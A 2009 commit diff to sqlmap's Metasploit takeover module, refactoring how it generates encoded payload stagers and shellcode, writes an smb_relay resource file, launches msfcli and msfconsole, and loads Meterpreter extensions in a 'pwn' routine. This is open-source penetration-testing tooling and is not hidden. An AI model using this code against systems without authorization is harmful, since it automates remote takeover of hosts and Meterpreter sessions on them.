Minor bug fixes and code refactoring

bdamele · bdamele · commit 06cc2a6d70a4 · 2009-05-11T15:37:48.000Z
diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py
@@ -300,7 +300,7 @@ def __selectRhost(self):
 
 
     def __selectLhost(self):
-        if self.connectionStr.startswith("reverse"):
+        if self.connectionStr.startswith("reverse") or self.resourceFile != None:
             message = "which is the local address? [%s] " % self.localIP
             address = readInput(message, default=self.localIP)
 
@@ -355,6 +355,8 @@ def __forgeMsfConsoleCmd(self):
 
 
     def __forgeMsfConsoleResource(self):
+        self.resourceFile = "%s/%s" % (conf.outputPath, self.__randFile)
+
         self.__prepareIngredients(encode=False, askChurrasco=False)
 
         self.__resource  = "use windows/smb/smb_relay\n"
@@ -374,14 +376,12 @@ def __forgeMsfConsoleResource(self):
 
         self.__resource += "exploit\n"
 
-        self.resourceFile = "%s/%s" % (conf.outputPath, self.__randFile)
-        self.resourceFp   = open(self.resourceFile, "w")
-
+        self.resourceFp = open(self.resourceFile, "w")
         self.resourceFp.write(self.__resource)
         self.resourceFp.close()
 
 
-    def __forgeMsfPayloadCmd(self, exitfunc="process", output="exe", extra=None):
+    def __forgeMsfPayloadCmd(self, exitfunc, format, outFile, extra=None):
         self.__payloadCmd  = self.__msfPayload
         self.__payloadCmd += " %s/%s" % (self.payloadStr, self.connectionStr)
         self.__payloadCmd += " EXITFUNC=%s" % exitfunc
@@ -394,24 +394,25 @@ def __forgeMsfPayloadCmd(self, exitfunc="process", output="exe", extra=None):
             raise sqlmapDataException, "unexpected connection type"
 
         if kb.os == "Windows":
-            self.__payloadCmd += " R | %s -e %s -t %s" % (self.__msfEncode, self.encoderStr, output)
+            self.__payloadCmd += " R | %s -a x86 -e %s -o %s -t %s" % (self.__msfEncode, self.encoderStr, outFile, format)
 
             if extra is not None:
                 self.__payloadCmd += " %s" % extra
 
+        # TODO: payload stager for Linux can not be encoded as long as
+        # Metasploit developers do not commit my minor patch for msfencode
         else:
-            self.__payloadCmd += " X"
+            self.__payloadCmd += " X > %s" % outFile
 
 
-    def __runMsfCli(self, exitfunc="process"):
+    def __runMsfCli(self, exitfunc):
         self.__forgeMsfCliCmd(exitfunc)
 
         infoMsg  = "running Metasploit Framework 3 command line "
         infoMsg += "interface locally, wait.."
         logger.info(infoMsg)
 
         logger.debug("executing local command: %s" % self.__cliCmd)
-
         self.__msfCliProc = execute(self.__cliCmd, shell=True, stdin=PIPE, stdout=PIPE)
 
 
@@ -420,7 +421,6 @@ def __runMsfConsole(self):
         logger.info(infoMsg)
 
         logger.debug("executing local command: %s" % self.__consoleCmd)
-
         self.__msfConsoleProc = execute(self.__consoleCmd, shell=True, stdin=PIPE, stdout=PIPE)
 
 
@@ -515,7 +515,7 @@ def __controlMsfCmd(self, proc, func):
 
                     metSess = re.search("Meterpreter session ([\d]+) opened", out)
 
-                    if metSess and self.payloadStr == "windows/meterpreter":
+                    if metSess:
                         self.__loadMetExtensions(proc, metSess.group(1))
 
             except EOFError:
@@ -530,16 +530,15 @@ def createMsfShellcode(self):
         logger.info(infoMsg)
 
         self.__randStr           = randomStr(lowercase=True)
-        self.shellcodeChar       = ""
         self.__shellcodeFilePath = "%s/sqlmapmsf%s" % (conf.outputPath, self.__randStr)
-        self.__shellcodeFileP    = open(self.__shellcodeFilePath, "wb")
+        self.shellcodeChar       = ""
 
         self.__initVars()
         self.__prepareIngredients(askChurrasco=False)
-        self.__forgeMsfPayloadCmd(exitfunc="seh", output="raw", extra="-b \"\\x00\\x27\"")
+        self.__forgeMsfPayloadCmd("seh", "raw", self.__shellcodeFilePath, "-b \"\\x00\\x27\"")
 
         logger.debug("executing local command: %s" % self.__payloadCmd)
-        process = execute(self.__payloadCmd, shell=True, stdout=self.__shellcodeFileP, stderr=PIPE)
+        process = execute(self.__payloadCmd, shell=True, stdout=None, stderr=PIPE)
 
         dataToStdout("\r[%s] [INFO] creation in progress " % time.strftime("%X"))
         pollProcess(process)
@@ -550,8 +549,6 @@ def createMsfShellcode(self):
         else:
             payloadSize = re.search("Length\:\s([\d]+)", payloadStderr, re.I)
 
-        self.__shellcodeFileP.close()
-
         if payloadSize:
             payloadSize = payloadSize.group(1)
 
@@ -561,9 +558,9 @@ def createMsfShellcode(self):
             errMsg = "failed to create the shellcode (%s)" % payloadStderr
             raise sqlmapFilePathException, errMsg
 
-        self.__shellcodeFileP  = open(self.__shellcodeFilePath, "rb")
-        self.__shellcodeString = self.__shellcodeFileP.read()
-        self.__shellcodeFileP.close()
+        self.__shellcodeFP     = open(self.__shellcodeFilePath, "rb")
+        self.__shellcodeString = self.__shellcodeFP.read()
+        self.__shellcodeFP.close()
 
         os.unlink(self.__shellcodeFilePath)
 
@@ -587,21 +584,21 @@ def createMsfPayloadStager(self, initialize=True):
 
         if kb.os == "Windows":
             self.exeFilePathLocal = "%s/sqlmapmsf%s.exe" % (conf.outputPath, self.__randStr)
+            self.__fileFormat     = "exe"
         else:
             self.exeFilePathLocal = "%s/sqlmapmsf%s" % (conf.outputPath, self.__randStr)
-
-        self.__exeFileP = open(self.exeFilePathLocal, "wb")
+            self.__fileFormat     = "elf"
 
         if initialize == True:
             self.__initVars()
 
         if self.payloadStr == None:
             self.__prepareIngredients()
 
-        self.__forgeMsfPayloadCmd()
+        self.__forgeMsfPayloadCmd("process", self.__fileFormat, self.exeFilePathLocal)
 
         logger.debug("executing local command: %s" % self.__payloadCmd)
-        process = execute(self.__payloadCmd, shell=True, stdout=self.__exeFileP, stderr=PIPE)
+        process = execute(self.__payloadCmd, shell=True, stdout=None, stderr=PIPE)
 
         dataToStdout("\r[%s] [INFO] creation in progress " % time.strftime("%X"))
         pollProcess(process)
@@ -612,8 +609,6 @@ def createMsfPayloadStager(self, initialize=True):
         else:
             payloadSize = re.search("Length\:\s([\d]+)", payloadStderr, re.I)
 
-        self.__exeFileP.close()
-
         os.chmod(self.exeFilePathLocal, stat.S_IRWXU)
 
         if payloadSize:
@@ -646,7 +641,7 @@ def uploadMsfPayloadStager(self):
 
 
     def pwn(self):
-        self.__runMsfCli()
+        self.__runMsfCli(exitfunc="process")
 
         if self.connectionStr.startswith("bind"):
             self.__runMsfPayloadRemote()
